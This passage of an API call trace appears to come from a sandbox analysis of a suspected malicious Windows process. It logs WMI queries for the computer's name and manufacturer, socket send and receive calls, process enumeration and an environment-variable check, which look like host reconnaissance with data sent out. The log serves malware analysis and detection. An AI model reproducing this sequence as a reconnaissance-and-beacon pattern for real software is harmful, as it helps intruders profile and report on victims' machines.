	[0201.802] WbemDefPath:IWbemPath:GetText (in: This=0x1c835ba0, lFlags=4, puBuffLength=0x1c80d040*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c80d040*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0201.802] CoTaskMemAlloc (cb=0x8) returned 0x1b804e50
	[0201.802] IEnumWbemClassObject:Next (in: This=0x1c83ddb8, lTimeout=-1, uCount=0x1, apObjects=0x1b804e50, puReturned=0x1c80d0f8 | out: apObjects=0x1b804e50*=0x0, puReturned=0x1c80d0f8*=0x0) returned 0x1
	[0201.807] CoTaskMemFree (pv=0x1b804e50) 
	[0201.807] CoGetContextToken (in: pToken=0x1c80ce80 | out: pToken=0x1c80ce80) returned 0x0
	[0201.807] WbemLocator:IUnknown:Release (This=0x1b808130) returned 0x1
	[0201.807] IUnknown:Release (This=0x1c83ddb8) returned 0x0
	[0201.813] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c835ba0, puCount=0x1c80d1a0 | out: puCount=0x1c80d1a0*=0x2) returned 0x0
	[0201.813] WbemDefPath:IWbemPath:GetText (in: This=0x1c835ba0, lFlags=4, puBuffLength=0x1c80d1a0*=0x0, pszText=0x0 | out: puBuffLength=0x1c80d1a0*=0x17, pszText=0x0) returned 0x0
	[0201.814] WbemDefPath:IWbemPath:GetText (in: This=0x1c835ba0, lFlags=4, puBuffLength=0x1c80d1a0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c80d1a0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0201.814] IWbemClassObject:Get (in: This=0x1c83de20, wszName="__NAMESPACE", lFlags=0, pVal=0x1c80d190*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d18c*=0, plFlavor=0x1c80d188*=0 | out: pVal=0x1c80d190*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\cimv2", varVal2=0x0), pType=0x1c80d18c*=8, plFlavor=0x1c80d188*=64) returned 0x0
	[0201.814] SysStringLen (param_1="ROOT\\cimv2") returned 0xa
	[0201.814] IWbemClassObject:Get (in: This=0x1c83de20, wszName="__NAMESPACE", lFlags=0, pVal=0x1c80d1a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d19c*=8, plFlavor=0x1c80d198*=64 | out: pVal=0x1c80d1a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\cimv2", varVal2=0x0), pType=0x1c80d19c*=8, plFlavor=0x1c80d198*=64) returned 0x0
	[0201.814] SysStringLen (param_1="ROOT\\cimv2") returned 0xa
	[0201.814] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c835ba0, puCount=0x1c80d1a0 | out: puCount=0x1c80d1a0*=0x2) returned 0x0
	[0201.814] WbemDefPath:IWbemPath:GetText (in: This=0x1c835ba0, lFlags=4, puBuffLength=0x1c80d1a0*=0x0, pszText=0x0 | out: puBuffLength=0x1c80d1a0*=0x17, pszText=0x0) returned 0x0
	[0201.814] WbemDefPath:IWbemPath:GetText (in: This=0x1c835ba0, lFlags=4, puBuffLength=0x1c80d1a0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c80d1a0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0201.814] IWbemClassObject:Get (in: This=0x1c83de20, wszName="__CLASS", lFlags=0, pVal=0x1c80d190*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d18c*=0, plFlavor=0x1c80d188*=0 | out: pVal=0x1c80d190*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem", varVal2=0x0), pType=0x1c80d18c*=8, plFlavor=0x1c80d188*=64) returned 0x0
	[0201.814] SysStringLen (param_1="Win32_ComputerSystem") returned 0x14
	[0201.814] IWbemClassObject:Get (in: This=0x1c83de20, wszName="__CLASS", lFlags=0, pVal=0x1c80d1a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d19c*=8, plFlavor=0x1c80d198*=64 | out: pVal=0x1c80d1a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem", varVal2=0x0), pType=0x1c80d19c*=8, plFlavor=0x1c80d198*=64) returned 0x0
	[0201.814] SysStringLen (param_1="Win32_ComputerSystem") returned 0x14
	[0201.815] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c835ba0, puCount=0x1c80d130 | out: puCount=0x1c80d130*=0x2) returned 0x0
	[0201.815] WbemDefPath:IWbemPath:GetText (in: This=0x1c835ba0, lFlags=4, puBuffLength=0x1c80d130*=0x0, pszText=0x0 | out: puBuffLength=0x1c80d130*=0x17, pszText=0x0) returned 0x0
	[0201.815] WbemDefPath:IWbemPath:GetText (in: This=0x1c835ba0, lFlags=4, puBuffLength=0x1c80d130*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c80d130*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0201.815] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c835ba0, puCount=0x1c80d130 | out: puCount=0x1c80d130*=0x2) returned 0x0
	[0201.815] WbemDefPath:IWbemPath:GetText (in: This=0x1c835ba0, lFlags=4, puBuffLength=0x1c80d130*=0x0, pszText=0x0 | out: puBuffLength=0x1c80d130*=0x17, pszText=0x0) returned 0x0
	[0201.815] WbemDefPath:IWbemPath:GetText (in: This=0x1c835ba0, lFlags=4, puBuffLength=0x1c80d130*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c80d130*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0201.815] IWbemClassObject:GetNames (in: This=0x1c83de20, wszQualifierName=0x0, lFlags=48, pQualifierVal=0x1c80d128*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pNames=0x1c80d120 | out: pNames=0x1c80d120*="\x01ƀ\x08") returned 0x0
	[0201.815] SafeArrayGetDim (psa=0x1b814a50) returned 0x1
	[0201.816] IWbemClassObject:Get (in: This=0x1c83de20, wszName="__GENUS", lFlags=0, pVal=0x1c80d120*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d11c*=0, plFlavor=0x1c80d118*=0 | out: pVal=0x1c80d120*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c80d11c*=3, plFlavor=0x1c80d118*=64) returned 0x0
	[0201.816] IWbemClassObject:Get (in: This=0x1c83de20, wszName="__CLASS", lFlags=0, pVal=0x1c80d120*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d11c*=0, plFlavor=0x1c80d118*=0 | out: pVal=0x1c80d120*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem", varVal2=0x0), pType=0x1c80d11c*=8, plFlavor=0x1c80d118*=64) returned 0x0
	[0201.816] SysStringLen (param_1="Win32_ComputerSystem") returned 0x14
	[0201.816] IWbemClassObject:Get (in: This=0x1c83de20, wszName="__SUPERCLASS", lFlags=0, pVal=0x1c80d120*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d11c*=0, plFlavor=0x1c80d118*=0 | out: pVal=0x1c80d120*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d11c*=8, plFlavor=0x1c80d118*=64) returned 0x0
	[0201.817] IWbemClassObject:Get (in: This=0x1c83de20, wszName="__DYNASTY", lFlags=0, pVal=0x1c80d120*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d11c*=0, plFlavor=0x1c80d118*=0 | out: pVal=0x1c80d120*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem", varVal2=0x0), pType=0x1c80d11c*=8, plFlavor=0x1c80d118*=64) returned 0x0
	[0201.817] SysStringLen (param_1="Win32_ComputerSystem") returned 0x14
	[0201.817] IWbemClassObject:Get (in: This=0x1c83de20, wszName="__RELPATH", lFlags=0, pVal=0x1c80d120*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d11c*=0, plFlavor=0x1c80d118*=0 | out: pVal=0x1c80d120*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem.Name=\"XDUWTFONO\"", varVal2=0x0), pType=0x1c80d11c*=8, plFlavor=0x1c80d118*=64) returned 0x0
	[0201.817] SysStringLen (param_1="Win32_ComputerSystem.Name=\"XDUWTFONO\"") returned 0x25
	[0201.817] IWbemClassObject:Get (in: This=0x1c83de20, wszName="__PROPERTY_COUNT", lFlags=0, pVal=0x1c80d120*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d11c*=0, plFlavor=0x1c80d118*=0 | out: pVal=0x1c80d120*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3a, varVal2=0x0), pType=0x1c80d11c*=3, plFlavor=0x1c80d118*=64) returned 0x0
	[0201.817] IWbemClassObject:Get (in: This=0x1c83de20, wszName="__DERIVATION", lFlags=0, pVal=0x1c80d120*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d11c*=0, plFlavor=0x1c80d118*=0 | out: pVal=0x1c80d120*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1b814a50*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x1b804e40, rgsabound=((cElements=0x0, lLbound=0))), varVal2=0x0), pType=0x1c80d11c*=8200, plFlavor=0x1c80d118*=64) returned 0x0
	[0201.818] IWbemClassObject:Get (in: This=0x1c83de20, wszName="__SERVER", lFlags=0, pVal=0x1c80d120*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d11c*=0, plFlavor=0x1c80d118*=0 | out: pVal=0x1c80d120*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XDUWTFONO", varVal2=0x0), pType=0x1c80d11c*=8, plFlavor=0x1c80d118*=64) returned 0x0
	[0201.818] SysStringLen (param_1="XDUWTFONO") returned 0x9
	[0201.819] IWbemClassObject:Get (in: This=0x1c83de20, wszName="__NAMESPACE", lFlags=0, pVal=0x1c80d120*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d11c*=0, plFlavor=0x1c80d118*=0 | out: pVal=0x1c80d120*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\cimv2", varVal2=0x0), pType=0x1c80d11c*=8, plFlavor=0x1c80d118*=64) returned 0x0
	[0201.819] SysStringLen (param_1="ROOT\\cimv2") returned 0xa
	[0201.819] IWbemClassObject:Get (in: This=0x1c83de20, wszName="__PATH", lFlags=0, pVal=0x1c80d120*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d11c*=0, plFlavor=0x1c80d118*=0 | out: pVal=0x1c80d120*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"", varVal2=0x0), pType=0x1c80d11c*=8, plFlavor=0x1c80d118*=64) returned 0x0
	[0201.819] SysStringLen (param_1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"") returned 0x3c
	[0201.819] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c835ba0, puCount=0x1c80d1c0 | out: puCount=0x1c80d1c0*=0x2) returned 0x0
	[0201.819] WbemDefPath:IWbemPath:GetText (in: This=0x1c835ba0, lFlags=4, puBuffLength=0x1c80d1c0*=0x0, pszText=0x0 | out: puBuffLength=0x1c80d1c0*=0x17, pszText=0x0) returned 0x0
	[0201.819] WbemDefPath:IWbemPath:GetText (in: This=0x1c835ba0, lFlags=4, puBuffLength=0x1c80d1c0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c80d1c0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0201.819] IWbemClassObject:Get (in: This=0x1c83de20, wszName="Manufacturer", lFlags=0, pVal=0x1c80d1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d1ac*=0, plFlavor=0x1c80d1a8*=0 | out: pVal=0x1c80d1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CLEVO", varVal2=0x0), pType=0x1c80d1ac*=8, plFlavor=0x1c80d1a8*=32) returned 0x0
	[0201.819] SysStringLen (param_1="CLEVO") returned 0x5
	[0201.820] IWbemClassObject:Get (in: This=0x1c83de20, wszName="Manufacturer", lFlags=0, pVal=0x1c80d3e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d3dc*=8, plFlavor=0x1c80d3d8*=32 | out: pVal=0x1c80d3e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CLEVO", varVal2=0x0), pType=0x1c80d3dc*=8, plFlavor=0x1c80d3d8*=32) returned 0x0
	[0201.820] SysStringLen (param_1="CLEVO") returned 0x5
	[0201.821] send (s=0x404, buf=0x3106bd0*, len=32, flags=0) returned 32
	[0201.822] recv (in: s=0x404, buf=0x3076510, len=502, flags=0 | out: buf=0x3076510*) returned 90
	[0201.830] VirtualQuery (in: lpAddress=0x1c80cce0, lpBuffer=0x1c80dba0, dwLength=0x30 | out: lpBuffer=0x1c80dba0*(BaseAddress=0x1c80c000, AllocationBase=0x1be80000, AllocationProtect=0x4, __alignment1=0xfffffa80, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0202.275] send (s=0x404, buf=0x312f7d0*, len=27, flags=0) returned 27
	[0202.276] recv (in: s=0x404, buf=0x3076510, len=502, flags=0 | out: buf=0x3076510*) returned 122
	[0202.283] VirtualQuery (in: lpAddress=0x1c80cce0, lpBuffer=0x1c80dba0, dwLength=0x30 | out: lpBuffer=0x1c80dba0*(BaseAddress=0x1c80c000, AllocationBase=0x1be80000, AllocationProtect=0x4, __alignment1=0xfffffa80, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0202.848] CoTaskMemAlloc (cb=0x104) returned 0x1b8240e0
	[0202.848] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8240e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0202.848] CoTaskMemFree (pv=0x1b8240e0) 
	[0203.649] EnumProcesses (in: lpidProcess=0x315e8e0, cb=0x400, lpcbNeeded=0x1c80cf30 | out: lpidProcess=0x315e8e0, lpcbNeeded=0x1c80cf30) returned 1
	[0203.653] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12d510e8, Length=0x20000, ResultLength=0x1c80ce50 | out: SystemInformation=0x12d510e8, ResultLength=0x1c80ce50*=0x14090) returned 0x0
	[0210.402] send (s=0x404, buf=0x31f1b18*, len=24, flags=0) returned 24
	[0210.403] recv (in: s=0x404, buf=0x3076510, len=502, flags=0 | out: buf=0x3076510*) returned 375
	[0210.414] VirtualQuery (in: lpAddress=0x1c80cce0, lpBuffer=0x1c80dba0, dwLength=0x30 | out: lpBuffer=0x1c80dba0*(BaseAddress=0x1c80c000, AllocationBase=0x1be80000, AllocationProtect=0x4, __alignment1=0xfffffa80, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0211.065] CoGetObjectContext (in: riid=0x1c80cff8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c80cff0 | out: ppv=0x1c80cff0*=0x181868) returned 0x0
	[0211.066] IComThreadingInfo:GetCurrentApartmentType (in: This=0x181868, pAptType=0x1c80d010 | out: pAptType=0x1c80d010*=1) returned 0x0
	[0211.066] IUnknown:QueryInterface (in: This=0x181868, riid=0x303e038*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c80d118 | out: ppvObject=0x1c80d118*=0x0) returned 0x80004002
	[0211.066] IUnknown:Release (This=0x181868) returned 0x1
	[0211.067] CoGetClassObject (in: rclsid=0x1b802378*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef322d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c80c680 | out: ppv=0x1c80c680*=0x1c831d00) returned 0x0
	[0211.067] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c831d00, riid=0x7fef322d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c80c390 | out: ppvObject=0x1c80c390*=0x0) returned 0x80004002
	[0211.067] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1c831d00, pUnkOuter=0x0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c378 | out: ppvObject=0x1c80c378*=0x1c83dcd0) returned 0x0
	[0211.068] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c83dcd0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c280 | out: ppvObject=0x1c80c280*=0x1c83dcd0) returned 0x0
	[0211.068] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c83dcd0, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c80c300 | out: ppvObject=0x1c80c300*=0x0) returned 0x80004002
	[0211.068] WbemDefPath:IUnknown:AddRef (This=0x1c83dcd0) returned 0x3
	[0211.068] CoGetContextToken (in: pToken=0x1c80bf50 | out: pToken=0x1c80bf50) returned 0x0
	[0211.068] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c83dcd0, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80bf10 | out: ppvObject=0x1c80bf10*=0x1b82bd20) returned 0x0
	[0211.272] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b82bd20, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c80bf40 | out: pCid=0x1c80bf40*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0211.272] WbemDefPath:IUnknown:Release (This=0x1b82bd20) returned 0x3
	[0211.272] CoGetContextToken (in: pToken=0x1c80bf20 | out: pToken=0x1c80bf20) returned 0x0
	[0211.272] WbemDefPath:IUnknown:AddRef (This=0x1c83dcd0) returned 0x4
	[0211.272] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c83dcd0, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c038 | out: ppvObject=0x1c80c038*=0x0) returned 0x80004002
	[0211.272] WbemDefPath:IUnknown:Release (This=0x1c83dcd0) returned 0x3
	[0211.273] WbemDefPath:IUnknown:Release (This=0x1c83dcd0) returned 0x2
	[0211.273] WbemDefPath:IUnknown:Release (This=0x1c831d00) returned 0x0
	[0211.273] WbemDefPath:IUnknown:Release (This=0x1c83dcd0) returned 0x1
	[0211.273] CoGetContextToken (in: pToken=0x1c80cc50 | out: pToken=0x1c80cc50) returned 0x0
	[0211.273] CoGetContextToken (in: pToken=0x1c80cb90 | out: pToken=0x1c80cb90) returned 0x0
	[0211.273] WbemDefPath:IUnknown:AddRef (This=0x1c83dcd0) returned 0x2
	[0211.273] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c83dcd0, riid=0x1c80ccd0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c80ccb0 | out: ppvObject=0x1c80ccb0*=0x1c83dcd0) returned 0x0
	[0211.273] WbemDefPath:IUnknown:Release (This=0x1c83dcd0) returned 0x2
	[0211.274] WbemDefPath:IUnknown:Release (This=0x1c83dcd0) returned 0x1
	[0211.274] CoGetContextToken (in: pToken=0x1c80cdd0 | out: pToken=0x1c80cdd0) returned 0x0
	[0211.274] CoGetContextToken (in: pToken=0x1c80cd10 | out: pToken=0x1c80cd10) returned 0x0
	[0211.274] WbemDefPath:IUnknown:AddRef (This=0x1c83dcd0) returned 0x2
	[0211.274] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c83dcd0, riid=0x1c80ce50*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c80ce30 | out: ppvObject=0x1c80ce30*=0x1c83dcd0) returned 0x0
	[0211.274] WbemDefPath:IUnknown:Release (This=0x1c83dcd0) returned 0x2
	[0211.274] WbemDefPath:IUnknown:AddRef (This=0x1c83dcd0) returned 0x3
	[0211.274] WbemDefPath:IWbemPath:SetText (This=0x1c83dcd0, uMode=0x4, pszPath="\\\\localhost\\root\\cimv2") returned 0x0
	[0211.274] WbemDefPath:IUnknown:Release (This=0x1c83dcd0) returned 0x2
	[0211.275] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c83dcd0, puCount=0x1c80d0e0 | out: puCount=0x1c80d0e0*=0x2) returned 0x0
	[0211.275] WbemDefPath:IWbemPath:GetText (in: This=0x1c83dcd0, lFlags=4, puBuffLength=0x1c80d0e0*=0x0, pszText=0x0 | out: puBuffLength=0x1c80d0e0*=0x17, pszText=0x0) returned 0x0
	[0211.275] WbemDefPath:IWbemPath:GetText (in: This=0x1c83dcd0, lFlags=4, puBuffLength=0x1c80d0e0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c80d0e0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0211.275] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c83dcd0, puCount=0x1c80d090 | out: puCount=0x1c80d090*=0x2) returned 0x0
	[0211.275] WbemDefPath:IWbemPath:GetText (in: This=0x1c83dcd0, lFlags=4, puBuffLength=0x1c80d090*=0x0, pszText=0x0 | out: puBuffLength=0x1c80d090*=0x17, pszText=0x0) returned 0x0
	[0211.275] WbemDefPath:IWbemPath:GetText (in: This=0x1c83dcd0, lFlags=4, puBuffLength=0x1c80d090*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c80d090*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0211.275] CoGetObjectContext (in: riid=0x1c80cfc8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c80cfc0 | out: ppv=0x1c80cfc0*=0x181868) returned 0x0
	[0211.275] IComThreadingInfo:GetCurrentApartmentType (in: This=0x181868, pAptType=0x1c80cfe0 | out: pAptType=0x1c80cfe0*=1) returned 0x0
	[0211.275] IUnknown:QueryInterface (in: This=0x181868, riid=0x303e038*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c80d0e8 | out: ppvObject=0x1c80d0e8*=0x0) returned 0x80004002
	[0211.276] IUnknown:Release (This=0x181868) returned 0x1
	[0211.276] CoGetClassObject (in: rclsid=0x1b8026f8*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef322d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c80cc70 | out: ppv=0x1c80cc70*=0x1c831da0) returned 0x0
	[0211.276] WbemLocator:IUnknown:QueryInterface (in: This=0x1c831da0, riid=0x7fef322d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c80c980 | out: ppvObject=0x1c80c980*=0x0) returned 0x80004002
	[0211.276] WbemLocator:IClassFactory:CreateInstance (in: This=0x1c831da0, pUnkOuter=0x0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c968 | out: ppvObject=0x1c80c968*=0x1c831dc0) returned 0x0
	[0211.276] WbemLocator:IUnknown:QueryInterface (in: This=0x1c831dc0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c870 | out: ppvObject=0x1c80c870*=0x1c831dc0) returned 0x0
	[0211.277] WbemLocator:IUnknown:QueryInterface (in: This=0x1c831dc0, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c80c8f0 | out: ppvObject=0x1c80c8f0*=0x0) returned 0x80004002
	[0211.277] WbemLocator:IUnknown:AddRef (This=0x1c831dc0) returned 0x3
	[0211.277] CoGetContextToken (in: pToken=0x1c80c540 | out: pToken=0x1c80c540) returned 0x0
	[0211.277] WbemLocator:IUnknown:QueryInterface (in: This=0x1c831dc0, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c500 | out: ppvObject=0x1c80c500*=0x0) returned 0x80004002
	[0211.278] CoGetContextToken (in: pToken=0x1c80c510 | out: pToken=0x1c80c510) returned 0x0
	[0211.278] WbemLocator:IUnknown:AddRef (This=0x1c831dc0) returned 0x4
